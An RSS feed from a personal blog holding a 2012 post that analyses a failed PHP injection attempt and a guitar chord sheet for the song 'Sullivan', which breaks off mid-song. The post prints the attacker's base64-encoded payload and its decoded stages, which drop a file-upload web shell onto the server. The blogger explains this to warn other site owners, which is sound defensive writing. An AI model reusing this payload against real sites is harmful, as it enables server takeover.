<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>JonnyPayne.com</title>
	<atom:link href="http://www.jonnypayne.com/index.php/feed/" rel="self" type="application/rss+xml" />
	<link>http://www.jonnypayne.com</link>
	<description>me uncovered.....</description>
	<lastBuildDate>Fri, 03 Feb 2012 18:43:11 +0000</lastBuildDate>
	<language>en</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
	<generator>http://wordpress.org/?v=3.3.1</generator>
		<item>
		<title>When they hacked my website</title>
		<link>http://www.jonnypayne.com/index.php/computer/when-they-hacked-my-website/</link>
		<comments>http://www.jonnypayne.com/index.php/computer/when-they-hacked-my-website/#comments</comments>
		<pubDate>Fri, 03 Feb 2012 12:53:35 +0000</pubDate>
		<dc:creator>Jon Payne</dc:creator>
				<category><![CDATA[Computer]]></category>
		<category><![CDATA[hacking]]></category>
		<category><![CDATA[web]]></category>

		<guid isPermaLink="false">http://www.jonnypayne.com/?p=4471</guid>
		<description><![CDATA[So&#8230;.The other day someone tried to hack one of my websites &#8211; not this one, another one &#8211; which shall remain nameless in case it is seen as some kind of challenge(!). As it happens I&#8217;m up on these things, particularly on the website in question so my installation was very secure &#8211; I had [...]]]></description>
			<content:encoded><![CDATA[<p>So&#8230;.The other day someone tried to hack one of my websites &#8211; not this one, another one &#8211; which shall remain nameless in case it is seen as some kind of challenge(!). As it happens I&#8217;m up on these things, particularly on the website in question so my installation was very secure &#8211; I had followed all the necessary security measures and the hacking attempt was unsuccessful. So what did they do?</p>
<p>Well actually, they raised a support ticket with a PHP injection script. What&#8217;s one of those? It&#8217;s one of these:</p>
<div>
<div>
<div>
<pre class="qoate-code"> {php#}eval(base64_decode('JGMzbyA9IGJhc2U2NF9kZWNvZGUoIlBEOXdhSEFOQ21WamFHOGdKenhtYjNKdElHRmpkR2x2YmowaUlpQnRaWFJvYjJROUluQnZjM1FpSUdWdVkzUjVjR1U5SW0xMWJIUnBjR0Z5ZEM5bWIzSnRMV1JoZEdFaUlHNWhiV1U5SW5Wd2JHOWhaR1Z5SWlCcFpEMGlkWEJzYjJGa1pYSWlQaWM3RFFwbFkyaHZJQ2M4YVc1d2RYUWdkSGx3WlQwaVptbHNaU0lnYm1GdFpUMGlabWxzWlNJZ2MybDZaVDBpTlRBaVBqeHBibkIxZENCdVlXMWxQU0pmZFhCc0lpQjBlWEJsUFNKemRXSnRhWFFpSUdsa1BTSmZkWEJzSWlCMllXeDFaVDBpVlhCc2IyRmtJajQ4TDJadmNtMCtKenNOQ21sbUtDQWtYMUJQVTFSYkoxOTFjR3duWFNBOVBTQWlWWEJzYjJGa0lpQXBJSHNOQ2dscFppaEFZMjl3ZVNna1gwWkpURVZUV3lkbWFXeGxKMTFiSjNSdGNGOXVZVzFsSjEwc0lDUmZSa2xNUlZOYkoyWnBiR1VuWFZzbmJtRnRaU2RkS1NrZ2V5QmxZMmh2SUNjOFlqNVZjR3h2WVdRZ1UxVkxVMFZUSUNFaElUd3ZZajQ4WW5JK1BHSnlQaWM3SUgwTkNnbGxiSE5sSUhzZ1pXTm9ieUFuUEdJK1ZYQnNiMkZrSUVkQlIwRk1JQ0VoSVR3dllqNDhZbkkrUEdKeVBpYzdJSDBOQ24wTkNqOCsiKTsNCiRyZWQgPSBmb3BlbigidGVtcGxhdGVzX2MvcmVkLnBocCIsInciKTsNCmZ3cml0ZSgkcmVkLCRjM28pOw=='));{/php#} </pre>
<p>Its very simple. It asks for the server to invoke the php interpreter (although I&#8217;ve hadded hashes in to prevent it from running anything untoward), and decode the (apparently gobbledy-gook) string.</p>
<p>It&#8217;s not gobbledy-gook of course, just encrypted with Base64 encoding to prevent natural language interpretation.</p>
<p>This first step failed miserably, but I thought it would be a good idea to run through the script and find out what would have happened if it had worked. So I decoded the string &#8211; and it comes out as a little more code and still more gobbledy-gook. like this:</p>
<pre class="qoate-code"> $c3o = base64_decode("PD9waHANCmVjaG8gJzxmb3JtIGFjdGlvbj0iIiBtZXRob2Q9InBvc3QiIGVuY3R5cGU9Im11bHRpcGFydC9mb3JtLWRhdGEiIG5hbWU9InVwbG9hZGVyIiBpZD0idXBsb2FkZXIiPic7DQplY2hvICc8aW5wdXQgdHlwZT0iZmlsZSIgbmFtZT0iZmlsZSIgc2l6ZT0iNTAiPjxpbnB1dCBuYW1lPSJfdXBsIiB0eXBlPSJzdWJtaXQiIGlkPSJfdXBsIiB2YWx1ZT0iVXBsb2FkIj48L2Zvcm0+JzsNCmlmKCAkX1BPU1RbJ191cGwnXSA9PSAiVXBsb2FkIiApIHsNCglpZihAY29weSgkX0ZJTEVTWydmaWxlJ11bJ3RtcF9uYW1lJ10sICRfRklMRVNbJ2ZpbGUnXVsnbmFtZSddKSkgeyBlY2hvICc8Yj5VcGxvYWQgU1VLU0VTICEhITwvYj48YnI+PGJyPic7IH0NCgllbHNlIHsgZWNobyAnPGI+VXBsb2FkIEdBR0FMICEhITwvYj48YnI+PGJyPic7IH0NCn0NCj8+"); $red = fopen("templates_c/red.php","w"); fwrite($red,$c3o); </pre>
<p>&nbsp;</p>
<p>Now we can begin to see what it will do. It sets a string variable ($c3o) to another decoded string, and tries to write it to the file system in &#8220;templates_c/red.php&#8221;. Now this never took place, but if it did, they would have been able to invoke the decoded string by running www.thewebsitetheytriedtohack.com/templates_c/red.php. So what would have happened if they had done that? Well, decoding that last little gobbledy-gook string gives us a natty little form:</p>
<pre class="qoate-code"> &lt;#php echo '

&lt;form id="uploader" action="" method="post" name="uploader" enctype="multipart/form-data"&gt;'; echo '
&lt;input type="file" name="file" size="50" /&gt; &lt;input id="_upl" type="submit" name="_upl" value="Upload" /&gt; &lt;/form&gt;'; if( $_POST['_upl'] == "Upload" ) { if(@copy($_FILES['file']['tmp_name'], $_FILES['file']['name'])) { echo '&lt;strong&gt;Upload SUKSES !!!&lt;/strong&gt;

&nbsp;
&lt;div&gt;'; } else { echo '&lt;strong&gt;Upload GAGAL !!!&lt;/strong&gt;'; } } #&gt; </pre>
</div>
<p>Basically it gives you a button to upload a file to the server. IF it works it tells you &#8220;Upload SUKSES !!!&#8221;, if it fails, it tells you &#8220;Upload GAGAL !!!&#8221;. That would allow a human user to navigate to the form, and upload anything they liked and run it on my webserver, which might be a spambot, or simple a PHP database query to steal information, all manner of possiblities.</p>
<p>&nbsp;</p>
<p>But if nothing else &#8211; this post should demonstrate the importance of getting your folder and directory access secure and LOCKED DOWN.</p>
<p>&nbsp;</p>
<p>Write access should be disabled unless it&#8217;s essential. Fascinating how our (malay, I believe) hacking compardre&#8217;s start their works!!!!</p>
</div>
</div>
</div>
]]></content:encoded>
			<wfw:commentRss>http://www.jonnypayne.com/index.php/computer/when-they-hacked-my-website/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Caroline&#8217;s Spine &#8211; Sullivan (Acoustic)</title>
		<link>http://www.jonnypayne.com/index.php/music/tab/carolines-spine-sullivan-acoustic/</link>
		<comments>http://www.jonnypayne.com/index.php/music/tab/carolines-spine-sullivan-acoustic/#comments</comments>
		<pubDate>Sun, 20 Mar 2011 15:46:44 +0000</pubDate>
		<dc:creator>Jon Payne</dc:creator>
				<category><![CDATA[Tab]]></category>
		<category><![CDATA[guitar]]></category>
		<category><![CDATA[music]]></category>
		<category><![CDATA[tab]]></category>

		<guid isPermaLink="false">http://www.jonnypayne.com/?p=246</guid>
		<description><![CDATA[]]></description>
			<content:encoded><![CDATA[<style>div.cnl_page { float: left; }div.cnl_line { margin: .7em; }div.cnl { display: inline; float: left; }div.cnl_clear { clear: both; }</style>
<div class="cnl_page">
<div class="cnl_line"></p>
</div>
<div class='cnl_clear'></div>
<div class="cnl_line">
<p><strong>Artist:</strong> Caroline&#39;s Spine</p>
</div>
<div class='cnl_clear'></div>
<div class="cnl_line">
<p><strong>Song:</strong> Sullivan (Acoustic)</p>
</div>
<div class='cnl_clear'></div>
<div class="cnl_line">
<p>&nbsp;</p>
</div>
<div class='cnl_clear'></div>
<div class="cnl_line">
<div class="cnl">
<div class="chord"><strong></strong>&nbsp;</div>
<div class="lyric">In</div>
</div>
<div class="cnl">
<div class="chord"><strong>Em</strong>&nbsp;</div>
<div class="lyric">tro&nbsp;</div>
</div>
<div class="cnl">
<div class="chord">&nbsp;</div>
<div class="lyric"> In</div>
</div>
<div class="cnl">
<div class="chord"><strong>C</strong>&nbsp;</div>
<div class="lyric">tro&nbsp;</div>
</div>
<div class="cnl">
<div class="chord">&nbsp;</div>
<div class="lyric"> x4</div>
</div>
</div>
<div class='cnl_clear'></div>
<div class="cnl_line">
<p>&nbsp;</p>
</div>
<div class='cnl_clear'></div>
<div class="cnl_line">
<div class="cnl">
<div class="chord"><strong></strong>&nbsp;</div>
<div class="lyric">It&#39;s not &nbsp;</div>
</div>
<div class="cnl">
<div class="chord"><strong>Em</strong>&nbsp;</div>
<div class="lyric">hard to reach back to the day&nbsp;under</div>
</div>
<div class="cnl">
<div class="chord"><strong>G</strong>&nbsp;</div>
<div class="lyric">neath that Iowa sun &nbsp;</div>
</div>
<div class="cnl">
<div class="chord"><strong>C</strong>&nbsp;</div>
<div class="lyric"></div>
</div>
</div>
<div class='cnl_clear'></div>
<div class="cnl_line">
<div class="cnl">
<div class="chord"><strong></strong>&nbsp;</div>
<div class="lyric"></div>
</div>
<div class="cnl">
<div class="chord"><strong>Em</strong>&nbsp;</div>
<div class="lyric">Running to the tower of waterloo&nbsp;</div>
</div>
<div class="cnl">
<div class="chord"><strong>G</strong>&nbsp;</div>
<div class="lyric">looking for the Sullivan &nbsp;</div>
</div>
<div class="cnl">
<div class="chord"><strong>C</strong>&nbsp;</div>
<div class="lyric">train to come&nbsp;</div>
</div>
</div>
<div class='cnl_clear'></div>
<div class="cnl_line">
<div class="cnl">
<div class="chord"><strong></strong>&nbsp;</div>
<div class="lyric">and &nbsp;</div>
</div>
<div class="cnl">
<div class="chord"><strong>Em</strong>&nbsp;</div>
<div class="lyric">his five boys would run to the top&nbsp;and &nbsp;</div>
</div>
<div class="cnl">
<div class="chord"><strong>G</strong>&nbsp;</div>
<div class="lyric">salute him as he went &nbsp;</div>
</div>
<div class="cnl">
<div class="chord"><strong>C</strong>&nbsp;</div>
<div class="lyric">by</div>
</div>
</div>
<div class='cnl_clear'></div>
<div class="cnl_line">
<div class="cnl">
<div class="chord"><strong></strong>&nbsp;</div>
<div class="lyric"></div>
</div>
<div class="cnl">
<div class="chord"><strong>Em</strong>&nbsp;</div>
<div class="lyric">first we&#39;d wave hell</div>
</div>
<div class="cnl">
<div class="chord"><strong>G</strong>&nbsp;</div>
<div class="lyric">o&nbsp;</div>
</div>
<div class="cnl">
<div class="chord">&nbsp;</div>
<div class="lyric"> &nbsp;</div>
</div>
<div class="cnl">
<div class="chord"><strong>A</strong>&nbsp;</div>
<div class="lyric">then we&#39;d wave goodbye</div>
</div>
<div class="cnl">
<div class="chord"><strong>C</strong>&nbsp;</div>
<div class="lyric">, Daddy goodbye</div>
</div>
</div>
<div class='cnl_clear'></div>
<div class="cnl_line">
<p>&nbsp;</p>
</div>
<div class='cnl_clear'></div>
<div class="cnl_line">
<div class="cnl">
<div class="chord"><strong></strong>&nbsp;</div>
<div class="lyric"></div>
</div>
<div class="cnl">
<div class="chord"><strong>Em</strong>&nbsp;</div>
<div class="lyric">it&#39;s not hard to reach back to the days&nbsp;</div>
</div>
<div class="cnl">
<div class="chord"><strong>G</strong>&nbsp;</div>
<div class="lyric">after the attack on &nbsp;</div>
</div>
<div class="cnl">
<div class="chord"><strong>C</strong>&nbsp;</div>
<div class="lyric">pearl</div>
</div>
</div>
<div class='cnl_clear'></div>
<div class="cnl_line">
<div class="cnl">
<div class="chord"><strong></strong>&nbsp;</div>
<div class="lyric">and &nbsp;</div>
</div>
<div class="cnl">
<div class="chord"><strong>Em</strong>&nbsp;</div>
<div class="lyric">overnight my buddies turned into men&nbsp;</div>
</div>
<div class="cnl">
<div class="chord"><strong>G</strong>&nbsp;</div>
<div class="lyric">running out of time for games and &nbsp;</div>
</div>
<div class="cnl">
<div class="chord"><strong>C</strong>&nbsp;</div>
<div class="lyric">girls</div>
</div>
</div>
<div class='cnl_clear'></div>
<div class="cnl_line">
<div class="cnl">
<div class="chord"><strong></strong>&nbsp;</div>
<div class="lyric">&nbsp;and the &nbsp;</div>
</div>
<div class="cnl">
<div class="chord"><strong>Em</strong>&nbsp;</div>
<div class="lyric">Sullivan boys were not overlooked&nbsp;</div>
</div>
<div class="cnl">
<div class="chord"><strong>G</strong>&nbsp;</div>
<div class="lyric">Uncle Sam callin&nbsp;each by &nbsp;</div>
</div>
<div class="cnl">
<div class="chord"><strong>C</strong>&nbsp;</div>
<div class="lyric">name</div>
</div>
</div>
<div class='cnl_clear'></div>
<div class="cnl_line">
<div class="cnl">
<div class="chord"><strong></strong>&nbsp;</div>
<div class="lyric"></div>
</div>
<div class="cnl">
<div class="chord"><strong>Em</strong>&nbsp;</div>
<div class="lyric">the very next day they &nbsp;</div>
</div>
<div class="cnl">
<div class="chord"><strong>G</strong>&nbsp;</div>
<div class="lyric">left on a myster</div>
</div>
<div class="cnl">
<div class="chord"><strong>A</strong>&nbsp;</div>
<div class="lyric">y train &nbsp; &nbsp; &nbsp;</div>
</div>
<div class="cnl">
<div class="chord"><strong>C</strong>&nbsp;</div>
<div class="lyric">&nbsp;&nbsp;</div>
</div>
</div>
<div class='cnl_clear'></div>
<div class="cnl_line">
<hr />
</div>
<div class='cnl_clear'></div>
<div class="cnl_line">
<p><strong>Chorus<span id="cke_bm_89E" style="display: none; ">&nbsp;</span></strong></p>
</div>
<div class='cnl_clear'></div>
<div class="cnl_line">
<p><span style="display: none; ">&nbsp;</span></p>
</div>
<div class='cnl_clear'></div>
<div class="cnl_line">
<div class="cnl">
<div class="chord"><strong></strong>&nbsp;</div>
<div class="lyric">Say goodby</div>
</div>
<div class="cnl">
<div class="chord"><strong>Em</strong>&nbsp;</div>
<div class="lyric">e&#8230;..bye,&nbsp;</div>
</div>
<div class="cnl">
<div class="chord">&nbsp;</div>
<div class="lyric"> b</div>
</div>
<div class="cnl">
<div class="chord"><strong>D</strong>&nbsp;</div>
<div class="lyric">ye, Mrs. &nbsp;</div>
</div>
<div class="cnl">
<div class="chord"><strong>A</strong>&nbsp;</div>
<div class="lyric">Sullivan&nbsp;</div>
</div>
<div class="cnl">
<div class="chord">&nbsp;</div>
<div class="lyric"> &nbsp;</div>
</div>
<div class="cnl">
<div class="chord"><strong>C</strong>&nbsp;</div>
<div class="lyric"></div>
</div>
</div>
<div class='cnl_clear'></div>
<div class="cnl_line">
<div class="cnl">
<div class="chord"><strong></strong>&nbsp;</div>
<div class="lyric">and don&#39;t you &nbsp;</div>
</div>
<div class="cnl">
<div class="chord"><strong>Em</strong>&nbsp;</div>
<div class="lyric">cry&#8230;.cry&nbsp;</div>
</div>
<div class="cnl">
<div class="chord">&nbsp;</div>
<div class="lyric"> cr</div>
</div>
<div class="cnl">
<div class="chord"><strong>D</strong>&nbsp;</div>
<div class="lyric">y&#8230;&#8230;cry&#8230;cr</div>
</div>
<div class="cnl">
<div class="chord"><strong>A</strong>&nbsp;</div>
<div class="lyric">y &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;</div>
</div>
<div class="cnl">
<div class="chord"><strong>C</strong>&nbsp;</div>
<div class="lyric"></div>
</div>
</div>
<div class='cnl_clear'></div>
<div class="cnl_line">
<div class="cnl">
<div class="chord"><strong></strong>&nbsp;</div>
<div class="lyric"></div>
</div>
<div class="cnl">
<div class="chord"><strong>Em</strong>&nbsp;</div>
<div class="lyric">&quot;-We regret to inform y</div>
</div>
<div class="cnl">
<div class="chord"><strong>D</strong>&nbsp;</div>
<div class="lyric">ou&nbsp;the Navy has ta</div>
</div>
<div class="cnl">
<div class="chord"><strong>A</strong>&nbsp;</div>
<div class="lyric">ken your sons away</div>
</div>
<div class="cnl">
<div class="chord"><strong>C</strong>&nbsp;</div>
<div class="lyric">-&quot;</div>
</div>
</div>
<div class='cnl_clear'></div>
<div class="cnl_line">
<div class="cnl">
<div class="chord"><strong></strong>&nbsp;</div>
<div class="lyric">all &nbsp;</div>
</div>
<div class="cnl">
<div class="chord"><strong>Em</strong>&nbsp;</div>
<div class="lyric">five&#8230;.five&nbsp;</div>
</div>
<div class="cnl">
<div class="chord">&nbsp;</div>
<div class="lyric"> f</div>
</div>
<div class="cnl">
<div class="chord"><strong>D</strong>&nbsp;</div>
<div class="lyric">ive&#8230;&#8230;five&nbsp;</div>
</div>
<div class="cnl">
<div class="chord">&nbsp;</div>
<div class="lyric"> fi</div>
</div>
<div class="cnl">
<div class="chord"><strong>A</strong>&nbsp;</div>
<div class="lyric">ve&#8230; so put your bl</div>
</div>
<div class="cnl">
<div class="chord"><strong>C</strong>&nbsp;</div>
<div class="lyric">ue star in the window</div>
</div>
</div>
<div class='cnl_clear'></div>
<div class="cnl_line">
<hr />
</div>
<div class='cnl_clear'></div>
<div class="cnl_line">
<div class="cnl">
<div class="chord"><strong></strong>&nbsp;</div>
<div class="lyric">It&#39;s not &nbsp;</div>
</div>
<div class="cnl">
<div class="chord"><strong>Em</strong>&nbsp;</div>
<div class="lyric">hard to reach back to her smile &nbsp;</div>
</div>
<div class="cnl">
<div class="chord"><strong>G</strong>&nbsp;</div>
<div class="lyric">when she&#39;d receive a &nbsp;</div>
</div>
<div class="cnl">
<div class="chord"><strong>C</strong>&nbsp;</div>
<div class="lyric">letter.</div>
</div>
</div>
<div class='cnl_clear'></div>
<div class="cnl_line">
<div class="cnl">
<div class="chord"><strong></strong>&nbsp;</div>
<div class="lyric">The let</div>
</div>
<div class="cnl">
<div class="chord"><strong>Em</strong>&nbsp;</div>
<div class="lyric">ters they sounded generally the same it said if they &nbsp;</div>
</div>
<div class="cnl">
<div class="chord"><strong>G</strong>&nbsp;</div>
<div class="lyric">couldn&#39;t be home at &nbsp;</div>
</div>
<div class="cnl">
<div class="chord"><strong>C</strong>&nbsp;</div>
<div class="lyric">least they were together on a</div>
</div>
</div>
<div class='cnl_clear'></div>
<div class="cnl_line">
<div class="cnl">
<div class="chord"><strong></strong>&nbsp;</div>
<div class="lyric"></div>
</div>
<div class="cnl">
<div class="chord"><strong>Em</strong>&nbsp;</div>
<div class="lyric">mighty fighting battleship, &nbsp;</div>
</div>
<div class="cnl">
<div class="chord"><strong>G</strong>&nbsp;</div>
<div class="lyric">somewhere in the south pacif</div>
</div>
<div class="cnl">
<div class="chord"><strong>C</strong>&nbsp;</div>
<div class="lyric">ic.</div>
</div>
</div>
<div class='cnl_clear'></div>
<div class="cnl_line">
<div class="cnl">
<div class="chord"><strong></strong>&nbsp;</div>
<div class="lyric">The le</div>
</div>
<div class="cnl">
<div class="chord"><strong>Em</strong>&nbsp;</div>
<div class="lyric">tters never got much more specific.</div>
</div>
</div>
<div class='cnl_clear'></div>
<div class="cnl_line">
<hr />
</div>
<div class='cnl_clear'></div>
<div class="cnl_line">
<p><b>Chorus</b></p>
</div>
<div class='cnl_clear'></div>
<div class="cnl_line">
<div class="cnl">
<div class="chord"><strong></strong>&nbsp;</div>
<div class="lyric">Say goodby</div>
</div>
<div class="cnl">
<div class="chord"><strong>Em</strong>&nbsp;</div>
<div class="lyric">e&#8230;..bye,&nbsp;</div>
</div>
<div class="cnl">
<div class="chord">&nbsp;</div>
<div class="lyric"> b</div>
</div>
<div class="cnl">
<div class="chord"><strong>D</strong>&nbsp;</div>
<div class="lyric">ye, &nbsp;Mrs. &nbsp;</div>
</div>
<div class="cnl">
<div class="chord"><strong>A</strong>&nbsp;</div>
<div class="lyric">Sullivan&nbsp;</div>
</div>
<div class="cnl">
<div class="chord">&nbsp;</div>
<div class="lyric"> &nbsp;</div>
</div>
<div class="cnl">
<div class="chord"><strong>C</strong>&nbsp;</div>
<div class="lyric"></div>
</div>
</div>
<div class='cnl_clear'></div>
<div class="cnl_line">
<div class="cnl">
<div class="chord"><strong></strong>&nbsp;</div>
<div class="lyric">and don&#39;t you &nbsp;</div>
</div>
<div class="cnl">
<div class="chord"><strong>Em</strong>&nbsp;</div>
<div class="lyric">cry&#8230;&#8230;cry,cr</div>
</div>
<div class="cnl">
<div class="chord"><strong>D</strong>&nbsp;</div>
<div class="lyric">y&#8230;..cry&#8230;cr</div>
</div>
<div class="cnl">
<div class="chord"><strong>A</strong>&nbsp;</div>
<div class="lyric">y</div>
</div>
</div>
<div class='cnl_clear'></div>
<div class="cnl_line">
<div class="cnl">
<div class="chord"><strong></strong>&nbsp;</div>
<div class="lyric"></div>
</div>
<div class="cnl">
<div class="chord"><strong>Em</strong>&nbsp;</div>
<div class="lyric">&quot;&#8230;we regret to inform y</div>
</div>
<div class="cnl">
<div class="chord"><strong>D</strong>&nbsp;</div>
<div class="lyric">ou that the Navy is kee</div>
</div>
<div class="cnl">
<div class="chord"><strong>A</strong>&nbsp;</div>
<div class="lyric">ping your sons away</div>
</div>
<div class="cnl">
<div class="chord"><strong>C</strong>&nbsp;</div>
<div class="lyric">&quot;</div>
</div>
</div>
<div class='cnl_clear'></div>
<div class="cnl_line">
<div class="cnl">
<div class="chord"><strong></strong>&nbsp;</div>
<div class="lyric">all &nbsp;</div>
</div>
<div class="cnl">
<div class="chord"><strong>Em</strong>&nbsp;</div>
<div class="lyric">five&#8230;.five,&nbsp;f</div>
</div>
<div class="cnl">
<div class="chord"><strong>D</strong>&nbsp;</div>
<div class="lyric">ive&#8230;..five,&nbsp;</div>
</div>
<div class="cnl">
<div class="chord">&nbsp;</div>
<div class="lyric"> fi</div>
</div>
<div class="cnl">
<div class="chord"><strong>A</strong>&nbsp;</div>
<div class="lyric">ve&#8230;..so keep your bl</div>
</div>
<div class="cnl">
<div class="chord"><strong>C</strong>&nbsp;</div>
<div class="lyric">ue star in the window.</div>
</div>
</div>
<div class='cnl_clear'></div>
<div class="cnl_line">
<hr />
</div>
<div class='cnl_clear'></div>
<div class="cnl_line">
<div class="cnl">
<div class="chord"><strong></strong>&nbsp;</div>
<div class="lyric">It&#39;s not &nbsp;</div>
</div>
<div class="cnl">
<div class="chord"><strong>Em</strong>&nbsp;</div>
<div class="lyric">hard to reach back to the day the &nbsp;</div>
</div>
<div class="cnl">
<div class="chord"><strong>G</strong>&nbsp;</div>
<div class="lyric">war finally came &nbsp;</div>
</div>
<div class="cnl">
<div class="chord"><strong>C</strong>&nbsp;</div>
<div class="lyric">Home</div>
</div>
</div>
<div class='cnl_clear'></div>
<div class="cnl_line">
<div class="cnl">
<div class="chord"><strong></strong>&nbsp;</div>
<div class="lyric">Uncle &nbsp;</div>
</div>
<div class="cnl">
<div class="chord"><strong>Em</strong>&nbsp;</div>
<div class="lyric">Sam will send you a telegram, so he do</div>
</div>
<div class="cnl">
<div class="chord"><strong>G</strong>&nbsp;</div>
<div class="lyric">esn&#39;t have to tell you &nbsp;</div>
</div>
<div class="cnl">
<div class="chord"><strong>C</strong>&nbsp;</div>
<div class="lyric">over the phone.</div>
</div>
</div>
<div class='cnl_clear'></div>
<div class="cnl_line">
<div class="cnl">
<div class="chord"><strong></strong>&nbsp;</div>
<div class="lyric"></div>
</div>
<div class="cnl">
<div class="chord"><strong>Em</strong>&nbsp;</div>
<div class="lyric">I heard she cracked up when she fo</div>
</div>
<div class="cnl">
<div class="chord"><strong>G</strong>&nbsp;</div>
<div class="lyric">und what the war had co</div>
</div>
<div class="cnl">
<div class="chord"><strong>C</strong>&nbsp;</div>
<div class="lyric">st.</div>
</div>
</div>
<div class='cnl_clear'></div>
<div class="cnl_line">
<div class="cnl">
<div class="chord"><strong></strong>&nbsp;</div>
<div class="lyric"></div>
</div>
<div class="cnl">
<div class="chord"><strong>Em</strong>&nbsp;</div>
<div class="lyric">All five of her &nbsp;</div>
</div>
<div class="cnl">
<div class="chord"><strong>G</strong>&nbsp;</div>
<div class="lyric">boys were &nbsp;</div>
</div>
<div class="cnl">
<div class="chord"><strong>C</strong>&nbsp;</div>
<div class="lyric">lost.</div>
</div>
</div>
<div class='cnl_clear'></div>
<div class="cnl_line">
<div class="cnl">
<div class="chord"><strong></strong>&nbsp;</div>
<div class="lyric">They were &nbsp;</div>
</div>
<div class="cnl">
<div class="chord"><strong>A</strong>&nbsp;</div>
<div class="lyric"></div>
</div>
</div>
<div class='cnl_clear'></div>
<div class="cnl_line">
<div class="cnl">
<div class="chord"><strong></strong>&nbsp;</div>
<div class="lyric">They were &nbsp;</div>
</div>
<div class="cnl">
<div class="chord"><strong>A</strong>&nbsp;</div>
<div class="lyric"></div>
</div>
</div>
<div class='cnl_clear'></div>
<div class="cnl_line">
<div class="cnl">
<div class="chord"><strong></strong>&nbsp;</div>
<div class="lyric">They were &nbsp;</div>
</div>
<div class="cnl">
<div class="chord"><strong>A</strong>&nbsp;</div>
<div class="lyric"></div>
</div>
</div>
<div class='cnl_clear'></div>
<div class="cnl_line">
<div class="cnl">
<div class="chord"><strong></strong>&nbsp;</div>
<div class="lyric">They were They were They were</div>
</div>
<div class="cnl">
<div class="chord"><strong>A</strong>&nbsp;</div>
<div class="lyric"></div>
</div>
</div>
<div class='cnl_clear'></div>
<div class="cnl_line">
<hr />
</div>
<div class='cnl_clear'></div>
<div class="cnl_line">
<p><strong>Chorus</strong></p>
</div>
<div class='cnl_clear'></div>
<div class="cnl_line">
<div class="cnl">
<div class="chord"><strong></strong>&nbsp;</div>
<div class="lyric">Say good</div>
</div>
<div class="cnl">
<div class="chord"><strong>Em</strong>&nbsp;</div>
<div class="lyric">bye&#8230;..bye&nbsp;</div>
</div>
<div class="cnl">
<div class="chord">&nbsp;</div>
<div class="lyric"> b</div>
</div>
<div class="cnl">
<div class="chord"><strong>D</strong>&nbsp;</div>
<div class="lyric">ye&#8230;&#8230; Mrs. &nbsp;</div>
</div>
<div class="cnl">
<div class="chord"><strong>A</strong>&nbsp;</div>
<div class="lyric">Sullivan&nbsp;</div>
</div>
<div class="cnl">
<div class="chord">&nbsp;</div>
<div class="lyric"> &nbsp;</div>
</div>
<div class="cnl">
<div class="chord"><strong>C</strong>&nbsp;</div>
<div class="lyric"></div>
</div>
</div>
<div class='cnl_clear'></div>
<div class="cnl_line">
<div class="cnl">
<div class="chord"><strong></strong>&nbsp;</div>
<div class="lyric">don&#39;t you &nbsp;</div>
</div>
<div class="cnl">
<div class="chord"><strong>Em</strong>&nbsp;</div>
<div class="lyric">cry&#8230;oh&nbsp;</div>
</div>
<div class="cnl">
<div class="chord"><strong>D</strong>&nbsp;</div>
<div class="lyric">go&nbsp;</div>
</div>
<div class="cnl">
<div class="chord">&nbsp;</div>
<div class="lyric"> ahead&#8230;.and&nbsp;</div>
</div>
<div class="cnl">
<div class="chord"><strong>A</strong>&nbsp;</div>
<div class="lyric">cry&#8230;.</div>
</div>
</div>
<div class='cnl_clear'></div>
<div class="cnl_line">
<div class="cnl">
<div class="chord"><strong></strong>&nbsp;</div>
<div class="lyric">&quot;you see&#8230; &nbsp;</div>
</div>
<div class="cnl">
<div class="chord"><strong>Em</strong>&nbsp;</div>
<div class="lyric">&#8230;we regret to inform y</div>
</div>
<div class="cnl">
<div class="chord"><strong>D</strong>&nbsp;</div>
<div class="lyric">ou that all your s</div>
</div>
<div class="cnl">
<div class="chord"><strong>A</strong>&nbsp;</div>
<div class="lyric">ons have passed away.</div>
</div>
<div class="cnl">
<div class="chord"><strong>C</strong>&nbsp;</div>
<div class="lyric">&quot;</div>
</div>
</div>
<div class='cnl_clear'></div>
<div class="cnl_line">
<div class="cnl">
<div class="chord"><strong></strong>&nbsp;</div>
<div class="lyric">all &nbsp;</div>
</div>
<div class="cnl">
<div class="chord"><strong>Em</strong>&nbsp;</div>
<div class="lyric">five&#8230;.five&nbsp;f</div>
</div>
<div class="cnl">
<div class="chord"><strong>D</strong>&nbsp;</div>
<div class="lyric">ive&#8230;&#8230;five&nbsp;fi</div>
</div>
<div class="cnl">
<div class="chord"><strong>A</strong>&nbsp;</div>
<div class="lyric">ve&#8230; so change your&nbsp;bl</div>
</div>
<div class="cnl">
<div class="chord"><strong>C</strong>&nbsp;</div>
<div class="lyric">ue&nbsp;star to gold</div>
</div>
</div>
<div class='cnl_clear'></div>
<div class="cnl_line">
<hr />
</div>
<div class='cnl_clear'></div>
<div class="cnl_line">
<div class="cnl">
<div class="chord"><strong></strong>&nbsp;</div>
<div class="lyric">b</div>
</div>
<div class="cnl">
<div class="chord"><strong>Em</strong>&nbsp;</div>
<div class="lyric">lue star to gol</div>
</div>
<div class="cnl">
<div class="chord"><strong>C</strong>&nbsp;</div>
<div class="lyric">d</div>
</div>
</div>
<div class='cnl_clear'></div>
<div class="cnl_line">
<div class="cnl">
<div class="chord"><strong></strong>&nbsp;</div>
<div class="lyric">oh &nbsp;</div>
</div>
<div class="cnl">
<div class="chord"><strong>Em</strong>&nbsp;</div>
<div class="lyric">blue&nbsp;</div>
</div>
<div class="cnl">
<div class="chord">&nbsp;</div>
<div class="lyric"> stars</div>
</div>
<div class="cnl">
<div class="chord"><strong>C</strong>&nbsp;</div>
<div class="lyric"></div>
</div>
</div>
<div class='cnl_clear'></div>
<div class="cnl_line">
<div class="cnl">
<div class="chord"><strong></strong>&nbsp;</div>
<div class="lyric">oooh&nbsp;</div>
</div>
<div class="cnl">
<div class="chord"><strong>Em</strong>&nbsp;</div>
<div class="lyric">the blue star</div>
</div>
